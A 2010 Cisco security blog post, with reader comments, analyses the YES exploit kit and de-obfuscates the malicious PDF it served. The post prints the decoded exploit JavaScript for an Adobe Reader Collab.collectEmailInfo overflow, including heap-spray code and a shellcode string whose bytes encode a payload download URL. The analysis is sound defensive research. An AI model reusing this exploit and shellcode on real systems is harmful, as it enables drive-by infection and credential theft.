Cisco Blogs

A Look Into Crimeware

April 26, 2010 - 4 Comments

Eleonore Exploits Pack, Liberty Exploit System, Yes Exploit System, ZueEsta Exploit Pack and Fragus Exploit Pack are all “exploit” systems that a miscreant can purchase to aid in building and monitoring a botnet.  These exploit systems will set the botmaster back a few hundred dollars, but in return they provide the aspiring botmaster with several exploits, an administration and tracking panel and some sort of software support.  These crimeware systems are often grouped as “Russian Crimeware” and are often times advertised for sale in various forums on the Internet.  These crimeware systems advertise varying levels of effectiveness, and often times additional modules can be purchased to increase that effectiveness. The systems work by essentially aiding a botmaster in putting up a malicious website. The botmaster then uses social engineering to lure victims to the malicious site where, once infected, the victims become a part of the botmaster’s botnet. Once the victim system is part of the botnet, the botmaster uses the endpoint for profit, either through leasing the systems to provide service such as spam or denial of service, or by stealing credentials from the victims and bundling these credentials and selling them.

During the course of research, I decided to take a look at the YES exploit system to learn more about it and to see how effective a system it really was. This post will give an overview of the YES exploit system, as well as look more in depth at the first exploit the it delivered during testing, which was an older PDF exploit.

Yes Exploit System Overview:

According to the YES website, YES is “one of the most effective browser-exploit packs from Russian blackhat community.” The Product claims the following capabilities, with comments in parenthesis:

  • Undetectable for AV-scanners (This would result in more infections, since end users with antivirus installed would still be infected and become part of the botnet.)
  • Detailed statistics such as OS-type, browser and Countries (This would help the botmaster determine what has been effective, as well as provide relevant information for when the botmaster leases the botnet or portions of the botnet to provide services such as spam and denial of service attacks.)
  • Auto Learning (This essentially introduces machine learning so that the exploit system determines what exploits have been most effective and targets users with those exploits first.)
  • Makware-domain-list checker (This will help the botmaster realize when the domains have been identified by services that identify and publish known malicious websites.)

Yes Exploit System

The exploit effectiveness percentage is claimed to be in the 10-20% range, meaning that 10-20%  percent of the users that visit the malicious site are actually exploited.  The licensing is domain and sub-domain based.  If the miscreant’s domain gets blacklisted, the YES exploit system maintainer will provide a free rebuild to work on another domain. However, if the botmaster has not been blacklisted there is an additional charge for switching the domain that YES is licensed to.

For the purpose of testing, I did all tests on a local network where I setup the software and used a vanilla Windows XP SP3 install to browse to the malicious site.

Initial Exploitation:

The initial HTTP connection returns a 301 Moved Permanently and the new location. The first attempted exploit with either the Firefox or Internet Explorer browser was a PDF exploit. Submitting the PDF sample to showed that 22/42 vendors detected this sample and that it was first seen in early March 2010 VirusTotal Analysis. According to the PDF footer, this document was created in 2008, but the document footer may not be accurate or the initial document could have been created and modified since then. I can confirm that this PDF was at least a couple weeks old.

<pre>/Title &lt;&gt;  /Producer (Scribus PDF Library &lt;&gt;/Keywords &lt;&gt;/Trapped /False/ModDate (2008312053854)/CreationDate (2008312053854) </pre>

What techniques does the YES Exploit System author use that makes this sample hard to detect given that the sample has been around for a few weeks and the detection is in the 50% range? I used Pyew Pyew for further analysis of the document. The overview and first few hundred bytes are below.

<pre>PDFiD 0.0.9_PL z5r.pdf PDF Header: %PDF-1.3 obj 14 endobj 14stream 2 endstream 2 xref 1trailer 1startxref 1/Page 1 /Encrypt 0 /ObjStm 0 /JS 2 /JavaScript 3 /AA 0 /OpenAction 1 /AcroForm 1 /JBIG2Decode 0 /RichMedia 0 /Colors &gt; 2^24 0 %%EOF 1 After last %%EOF 0 Total entropy: 7.396393 (4301 bytes) Entropy inside streams: 7.922360 (2671 bytes) Entropy outside streams: 5.004960 (1630 bytes)0000 25 50 44 46 2D 31 2E 33 0D 0A 25 E2 E3 CF D3 0D %PDF-1.3..%..... 0010 0A 31 20 30 20 6F 62 6A 0D 0A 3C 3C 2F 4F 70 65 .1 0 obj..<strong>&lt; 0020 6E 41 63 74 69 6F 6E 20 3C 3C 2F 4A 53 20 28 74 nAction &lt;</strong></pre>

The above section in bold shows that this PDF has an OpenAction of executing the this.qwer() function.  When an OpenAction tag is specified, the action is performed when the document is opened and does not require user interaction. The function this.qwer() will be executed without user interaction. This is pretty standard for malicious PDF documents.


Moving forward in the PDF document (not shown) we find that Object 13 is compressed and has a length of 2633. This is likely where our malicious code resides. Moving to that offset and decompressing the data we find obfuscated JavaScript. An OpenAction plus compressed and obfuscated JavaScript is pretty standard for documents with malicious intent. The variable var “s” looks to be  purposely obfuscated (to make detection and analysis more difficult), and the variable has been truncated below.

<pre>[0x00000400]&gt; pdfvi Stream 1-----------------------------------------------------0 0 595.28000 841.89000 re W n-----------------------------------------------------Continue? yApplying Filter FlateDecode ...Encoded Stream 2-----------------------------------------------------var m65b = "#e#v#a##l#".replace(/[#]/g, ""); var g34v = eval(m65b); var s = " 55.53.101. 100.55.53." .replace(/[A-Za-z]/g,function (x8f){return String.fromCharCode((((x8f = x8f.charCodeAt(0)) &amp; 223) - 52) % 26 + (x8f &amp; 32) + 65);}).split(".");<strong>var m65b = "";for (var i=0; i { m65b += String.fromCharCode(s i]); }</strong>function qwer(){ g34v(m65b); }</pre>

Analyzing the above code segment, the statement in bold decodes the variable “s” which has been purposely obfuscated.  I created a simple script with the decoder section and variable “s” to decode the variable “s”. Alternatively, the encoding is a simple transposition of characters into their integer equivalent and a number of simple scripts could be created to perform this same action. The decoded JavaScript from the variable “s” is shown below:

<pre>function z5r(d75e) { util.printf(d75e); } function x91x(p37v) { Collab.collectEmailInfo(p37v); } function x96p(k3j, a6f) {while (k3j.length*2&lt; num; i++) { z += content.toString(); } return z; } <strong>var t10k = app.viewerVersion.toString(); t10k = t10k.replace(/D/g,""); var k69u = new Array(t10k.charAt(0),t10k.charAt(1),t10k.charAt(2));</strong>var b70t = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u312F%u3239%u312E%u3836%u312E%u312E%u3130%u792F%u7365%u2E32%u2F30%u6F6C%u6461%u702E%u7068%u733F%u6174%u3D74%u6957%u646E%u776F%u2073%u5058%u467C%u7269%u6665%u786F%u3320%u352E%u372E%u4F7C%u7C31%u6946%u6572%u6F46%u0078");<strong>if (k69u[0] == 8 &amp;&amp; k69u[1] == 1 &amp;&amp; k69u[2] == 2)</strong> { var x96p = unescape("%u0A0A%u0A0A"); var k3j = 20; var c82n = k3j+b70t.length; while (x96p.length &lt; c82n) x96p += x96p; var h72l = x96p.substring(0, c82n); var f37v = x96p.substring(0, x96p.length - c82n); while (f37v.length + c82n &lt; 0x60000) f37v=f37v+f37v+h72l; var b25u = new Array(); for (s67v = 0; s67v &lt; 1200; s67v++) { b25u[s67v] = f37v + b70t } var c70y = 12 + i31j(18, 9) + i31j(276, 8); var h4f = "12%34@5@0@0@0123f@"; h4f = h4f.replace(/[123@]/g, ""); z5r(h4f,c70y); } else { var r79i = "@0@x@0@c@0@c@0@c@0@c@"; r79i = r79i.replace(/[@]/g, ""); var c86b = "@0@x@4@0@@0@@0@@0@0@"; c86b = c86b.replace(/[@]/g, ""); var x30s = new Array(); var c70y = r79i; var f37v = c86b; var b25u = b70t.length * 2; var a6f = f37v - (b25u+0x38); var r42n = "@%@u@9@0@9@0@%@u@9@0@9@0@"; r42n = r42n.replace(/[@]/g, ""); var k3j = unescape(r42n); k3j = x96p(k3j, a6f); var h72l = (c70y - c86b)/f37v; for (var g74h=0;g74h&lt; 44952) s67v += s67v; var o4y = this; o4y = o4y.collabStore; o4y = x91x( { subj: "",msg: s67v } ); }</pre>

From the decoded JavaScript shown above, we can see that one of the vulnerabilities being exploited is CVE-2007-5659, Adobe Reader / Acrobat Collab.collectEmailInfo() Method Overflow, which was disclosed in February 2008. We can also see that the variable t10k holds the version information (highlighted above), which along with the array k69u (also highlighted), is used to determine if this is version 8.12. Depending on the version information, an if statement or else statement sets up the rest of the exploit. We also can see more deliberate attempts to obfuscate or confuse analysis by using nonsensical variable naming. The variable “b70t” is the shellcode. An exe file can be created from this using the Shellcode to Exe converter. The variables that utilize the unescape method are nops, memory addresses, or shellcode.

The code was initially obfuscated using transposition of characters and integers. The JavaScript was nice enough to provide a function to de-obfuscate this section.  Determining what the code actually does is more challenging, since other techniques were used to purposefully hinder code analysis (nonsensical variable naming and renaming and using the replace method to modify declared strings). For instance, in the code section below, the variables “r79i” and “c86b” are defined and then they are transposed via the replace() method. These variables are then renamed. By simplifying the code it can be made more readable:

<pre>var r79i = "@0@x@0@c@0@c@0@c@0@c@"; r79i = r79i.replace(/[@]/g, ""); var c86b = "@0@x@4@0@@0@@0@@0@0@"; c86b = c86b.replace(/[@]/g, ""); var x30s = new Array(); var c70y = r79i; var f37v = c86b;</pre>

Simplifying the above code section results in the following:

<pre>var c70y = "0x0c0c0c0c"; var f37v = "0x400000"; var x30s = new Array(); var c70y = r79i; var f37v = c86b;</pre>

We see the same techniques used in the following code section as well:

<pre>var s97r = "@%@u@0@c@0@c@%@u@0@c@0@c@"; s97r = s97r.replace(/[@]/g, ""); var s67v = unescape(s97r); while (s67v.length &lt; 44952)s67v += s67v; var o4y = this ; o4y = o4y.collabStore; o4y = x91x({ subj : "", msg : s67v</pre>

When the obfuscation is removed, the code will look like this, with s67v being the overflow:

<pre>var s67v = unescape("%u0c0c%u0c0c"); while (s67v.length &lt; 44952)s67v += s67v; var o4y = this ; o4y = o4y.collabStore; o4y = x91x({ subj : "", msg : s67v</pre>

This PDF exploits an older vulnerability. The PDF itself uses an AutoOpen Action and contains compressed JavaScript. This is very standard for malicious PDF files. The JavaScript itself is obfuscated via character transposition. Once it has been de-obfuscated, other forms of obfuscation are used, such as replace functions and variable naming and renaming. All of these behaviors are very common with malicious documents, although perhaps there is not as many layers of obfuscation. But regardless of how well known the techniques are, they still appear to be effective at exploiting end-user systems, and somewhat effective at avoiding detection.

In an effort to keep conversations fresh, Cisco Blogs closes comments after 60 days. Please visit the Cisco Blogs hub page for the latest content.


  1. …cute that your photo has you in a black and white striped shirt for this article. : )I’m getting exasperated, myself – I clean customer machines for part of my living, but I’m trying to move on from that into community building, and the number of people who personally contact me for advice is getting overwhelming. I’m trying to think of a re-education campaign of sorts – because most of what has been talked about so far is overcomplicated and tedious for most people. Worse, what was true five years ago isn’t, any longer – I can make my users more secure with Javascript enabled than disabled, for example.

  2. AnotherKevin your comments are pretty much dead on. Signature based products have a hard time keeping up with how quickly the malware evolves and behavior based host based solutions have low adoption rates. That really only leaves, user education along with a group of other solutions such as IP reputation, black lists, and AV. In many cases, even patching is no solution because often the vulnerability is social engineering and not software based. By no means perfect.

  3. Excellent analysis! What are the current best practices for defending against client side attacks like this? Anti-virus solutions are lagging far behind such dynamic threats and smarter host-based protections like Cisco Security Agent and host-based IPS seem to have low adoption rates. The botnet comms can be tracked and blocked with limited success but initial infections are much harder to prevent.

  4. Thanks for the information. I was not aware. Your research is most helpful.Thanks Melissa